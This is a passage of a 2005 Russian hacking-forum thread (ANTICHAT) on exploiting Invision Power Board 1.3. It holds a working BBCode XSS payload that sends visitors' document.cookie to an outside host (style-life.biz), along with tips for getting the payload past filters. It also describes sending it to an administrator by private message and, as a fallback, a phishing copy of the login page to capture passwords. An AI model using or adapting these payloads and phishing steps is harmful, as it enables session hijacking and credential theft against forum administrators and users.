ANTICHAT
Страница 2 из 2 < 1 2
Показывать 40 сообщений этой темы на одной странице

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости CMS / форумов (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Вопросы по форуму Invision Power Board(U) v1.3 Final © 2003(р) (https://forum.antichat.xyz/showthread.php?t=5233)

FRTD 12.03.2005 17:26
(-=util=-)
1)а свой сниффер я как намучу?
2)а универсальных фишек нет,для большенства браузеров?Мне говорили,что видео идёт на всех,но у меня не выходило,напишите пажаласта полный код(например для форума www.vasyapup.com/forum)

(-=util=-) 12.03.2005 17:58
сейчас опубликую исходник снифера (готовый) в разделе

Delphi, С/С++, C#, JavaScript

FRTD 12.03.2005 22:05
Увидел,скачал.И у меня есть вопросы:
1)Если я его на народ загружу он пахать будет?
2)не грузится файл .htaccess.Он должен грузиться?
3)зачем тама ссыла"СНИФЕР (картинка)".Нажимаешь,а картинку невозможно открыть...
4)код красного цвета для IPB для всех версий?
5)зачем 2.jpg?
я мало в этом понимаю поэтому много вопросов...

(-=util=-) 12.03.2005 22:37
http://forum.antichat.ru/showthread.php?p=31012 Пояснил
Все твои ошибки из-за того что народ неподходит.

advlam 12.03.2005 23:12
пишу я в форуме 1.3.1, как указано в доке к сниферу -=util=-:
Код:
[color=http://000.aa/=`image.jpg]` style=background:url(javascript:document.images[12].src="http://style-life.biz/onelinetoolz/sn/me.jpg?"+document.cookie) [/color]
не проканывает, в форуме отображается как:
Код:
'>` style=background:url(javascript:document.images[12].src="http://style-life.biz/onelinetoolz/sn/me.jpg?"+document.cookie)

(-=util=-) 12.03.2005 23:55
1. Работает в IE и в большенстве форумов 100% работает в плоть до версий 2.0.Х.
2. Если только админы не гении и сами незакрыли дыру. Незнаю патч есть или нет.
3. Попробуй в др. форумах. Попробуй images[12]. заменить на images[0]. Попробуй [color= заменить на [video=
и т.д........

FRTD 13.03.2005 00:09
(-=util=-)
вощем мне не светит свой снифф поиметь:)

chip 28.03.2005 20:58
мля меня ташнит. =(

hacsoft 28.03.2005 21:42
Цитата:
Сообщение от (-=util=-)
1. делаешь свой снифер (чтобы без всяких подписок) Используешь баг с спаренными тэгами (т.е. пихаешь админу в ПМ снифер). И ждёшь когда прилетят к тебе куки. Потом редактируешь свои.
2. (если куки непришли) Спомощью тех же тэгов делаешь пересылку на свою страницу в ПМ админу. А на своей странице точная копия того форума (одна страница ошибки авторизации) Но в теле этой страницы ввод пароля и логина придёт к тебе на ящик. :)
Покрайней мере у меня работало =)
P.S. Это для MyIE и IE
Ну этого не достаточно. Еще бы надо, что бы админ был ламер. А то поймет и пасс поменяет :)

hacsoft 28.03.2005 21:46
Цитата:
Сообщение от FRTD
(-=util=-)
вощем мне не светит свой снифф поиметь:)
А на этот счет я всегда так говорю: прежде чем что-то ломать, выучи необходимый минимум (хотя бы поверхностно): HTML, CSS, JavaScript, PHP, MySQL, можно Perl (не обязательно, признаю, я его сам не сильно знаю).
А то только видео и подавай, что бы показать, куда нажать и сразу пасс получить.

P.S. (оффтоп, простите). Случай: одим ламхакер хотел phpbb2 ломануть. Так вот он по видео с этого сайта и пробует. Прикол в том, что на том форуме первый пользователь не был админом (ну так получилось). Так он и голову ломал потом, почему ссылки нет на панель админа. Т.е. мозги вообще не шевелятся, не понимая даже почему тот метод взлома работает пытается его использовать по стандартному шаболону, а тут тебе рас и не шаблонная ситуация и крутой хакер превращается в судрожно бьющуюся рыбу на берегу (т.е. ламера)

FRTD 02.04.2005 02:48
я ламер,но не думаю что до такого(надеюсь=))


Время: 18:16
Страница 2 из 2 < 1 2
Показывать 40 сообщений этой темы на одной странице